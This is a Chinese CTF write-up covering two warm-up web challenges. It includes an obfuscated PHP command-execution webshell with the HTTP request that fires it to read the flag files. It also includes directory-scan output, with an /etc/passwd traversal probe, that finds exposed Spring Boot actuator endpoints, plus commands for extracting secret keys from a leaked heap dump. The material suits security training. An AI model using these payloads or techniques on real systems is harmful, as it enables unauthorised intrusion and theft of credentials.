京麒CTF2025热身赛

本来不想来看的,但是群里一直在复读,难道会很有意思?

Execute

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$a = 'edoced_46esab';
$b = strrev($a);

$d = 'c3~@#@#@lz!@dGVt';
$s = $b($d);

echo $s;
$s($_POST[1]);
$e='php';
$f='in';
$w='fo';
$g=$e.$f.$w;
$g();
?>
1
2
3
4
5
6
7
8
9
10
11
12
POST /execute.php HTTP/1.1
Host: 39.106.16.204:44099
Origin: http://39.106.16.204:44099
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer: http://39.106.16.204:44099/
Accept-Encoding: gzip, deflate
Content-Length: 216

code=%3C%3Fphp%0A%24a%20%3D%20'edoced_46esab'%3B%0A%24b%20%3D%20strrev(%24a)%3B%0A%0A%24d%20%3D%20'c3~%40%23%40%23%40lz!%40dGVt'%3B%0A%24s%20%3D%20%24b(%24d)%3B%0A%0Aecho%20%24s%3B%0A%24s(%24_POST%5B1%5D)%3B%0A%3F%3E&1=tac /f*

没压力啊,直接秒了

EzLogin

没什么思路,扫描一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
└─$ dirsearch -u http://39.106.16.204:61457/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_39.106.16.204_61457/__25-05-22_00-39-07.txt

Target: http://39.106.16.204:61457/

[00:39:07] Starting:
[00:39:14] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:39:14] 404 - 96B - /;/login
[00:39:15] 400 - 435B - /a%5c.aspx
[00:39:15] 404 - 111B - /actuator/;/auditevents
[00:39:15] 404 - 105B - /actuator/;/beans
[00:39:15] 404 - 108B - /actuator/;/auditLog
[00:39:15] 404 - 110B - /actuator/;/conditions
[00:39:15] 200 - 2KB - /actuator
[00:39:15] 404 - 106B - /actuator/;/caches
[00:39:15] 404 - 111B - /actuator/;/configprops
[00:39:15] 404 - 121B - /actuator/;/configurationMetadata
[00:39:15] 404 - 104B - /actuator/;/dump
[00:39:15] 404 - 108B - /actuator/;/features
[00:39:15] 404 - 106B - /actuator/;/health
[00:39:15] 404 - 111B - /actuator/;/healthcheck
[00:39:15] 404 - 124B - /actuator/;/exportRegisteredServices
[00:39:15] 404 - 106B - /actuator/;/flyway
[00:39:15] 404 - 103B - /actuator/;/env
[00:39:15] 404 - 106B - /actuator/;/events
[00:39:15] 404 - 108B - /actuator/;/heapdump
[00:39:15] 404 - 109B - /actuator/;/httptrace
[00:39:15] 404 - 104B - /actuator/;/info
[00:39:15] 404 - 107B - /actuator/;/jolokia
[00:39:15] 404 - 107B - /actuator/;/logfile
[00:39:15] 404 - 116B - /actuator/;/integrationgraph
[00:39:15] 404 - 109B - /actuator/;/liquibase
[00:39:15] 404 - 108B - /actuator/;/mappings
[00:39:15] 404 - 113B - /actuator/;/loggingConfig
[00:39:15] 404 - 107B - /actuator/;/refresh
[00:39:15] 404 - 117B - /actuator/;/releaseAttributes
[00:39:15] 404 - 107B - /actuator/;/loggers
[00:39:15] 404 - 107B - /actuator/;/metrics
[00:39:15] 404 - 110B - /actuator/;/prometheus
[00:39:15] 404 - 118B - /actuator/;/registeredServices
[00:39:16] 404 - 113B - /actuator/;/springWebflow
[00:39:16] 404 - 103B - /actuator/;/sso
[00:39:16] 404 - 110B - /actuator/;/statistics
[00:39:16] 404 - 102B - /actuator/dump
[00:39:16] 404 - 108B - /actuator/;/sessions
[00:39:16] 404 - 110B - /actuator/;/threaddump
[00:39:16] 404 - 117B - /actuator/;/resolveAttributes
[00:39:16] 404 - 114B - /actuator/;/scheduledtasks
[00:39:16] 404 - 106B - /actuator/;/status
[00:39:16] 404 - 108B - /actuator/;/shutdown
[00:39:16] 404 - 119B - /actuator/configurationMetadata
[00:39:16] 404 - 109B - /actuator/auditevents
[00:39:16] 404 - 111B - /actuator/;/ssoSessions
[00:39:16] 404 - 104B - /actuator/events
[00:39:16] 404 - 106B - /actuator/auditLog
[00:39:16] 404 - 122B - /actuator/exportRegisteredServices
[00:39:16] 404 - 105B - /actuator/;/trace
[00:39:16] 404 - 107B - /actuator/httptrace
[00:39:16] 404 - 104B - /actuator/flyway
[00:39:16] 404 - 114B - /actuator/integrationgraph
[00:39:16] 404 - 112B - /actuator/gateway/routes
[00:39:16] 404 - 109B - /actuator/healthcheck
[00:39:16] 200 - 20B - /actuator/caches
[00:39:16] 404 - 105B - /actuator/jolokia
[00:39:16] 404 - 106B - /actuator/features
[00:39:16] 404 - 105B - /actuator/logfile
[00:39:16] 404 - 107B - /actuator/liquibase
[00:39:16] 200 - 2B - /actuator/info
[00:39:16] 404 - 115B - /actuator/resolveAttributes
[00:39:16] 404 - 111B - /actuator/loggingConfig
[00:39:16] 404 - 105B - /actuator/refresh
[00:39:16] 404 - 106B - /actuator/shutdown
[00:39:16] 404 - 106B - /actuator/sessions
[00:39:16] 404 - 116B - /actuator/registeredServices
[00:39:16] 404 - 108B - /actuator/prometheus
[00:39:16] 404 - 115B - /actuator/releaseAttributes
[00:39:16] 404 - 108B - /actuator/management
[00:39:16] 404 - 111B - /actuator/springWebflow
[00:39:16] 200 - 8KB - /actuator/env
[00:39:16] 404 - 104B - /actuator/status
[00:39:16] 200 - 1018B - /actuator/metrics
[00:39:16] 200 - 93KB - /actuator/beans
[00:39:16] 404 - 108B - /actuator/statistics
[00:39:16] 404 - 103B - /actuator/trace
[00:39:16] 404 - 101B - /actuator/sso
[00:39:16] 404 - 109B - /actuator/ssoSessions
[00:39:16] 404 - 112B - /actuator/hystrix.stream
[00:39:16] 200 - 54B - /actuator/scheduledtasks
[00:39:16] 200 - 49KB - /actuator/loggers
[00:39:17] 200 - 22KB - /actuator/mappings
[00:39:17] 200 - 268B - /actuator/health
[00:39:17] 200 - 99KB - /actuator/conditions
[00:39:17] 200 - 197KB - /actuator/threaddump
[00:39:17] 200 - 33MB - /actuator/heapdump
[00:39:18] 200 - 14KB - /actuator/configprops
[00:39:32] 404 - 102B - /images/README
[00:39:32] 404 - 103B - /images/c99.php
[00:39:32] 404 - 103B - /images/Sym.php
[00:39:35] 200 - 11KB - /login
[00:39:35] 200 - 11KB - /login/

heapdump泄露,先把东西下载下来,随便找个工具来处理,不要strings当原始人

https://github.com/wyzxxz/heapdump_tool

https://github.com/whwlsfb/JDumpSpider 但是第一个工具并没有成功

1
2
3
java -jar heapdump_tools.jar C:\Users\baozhongqi\Desktop\heapdump2

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump2

拿到密钥之后用工具一把锁即可,如果不成功的多点点,随便乱按都能出,除非工具错了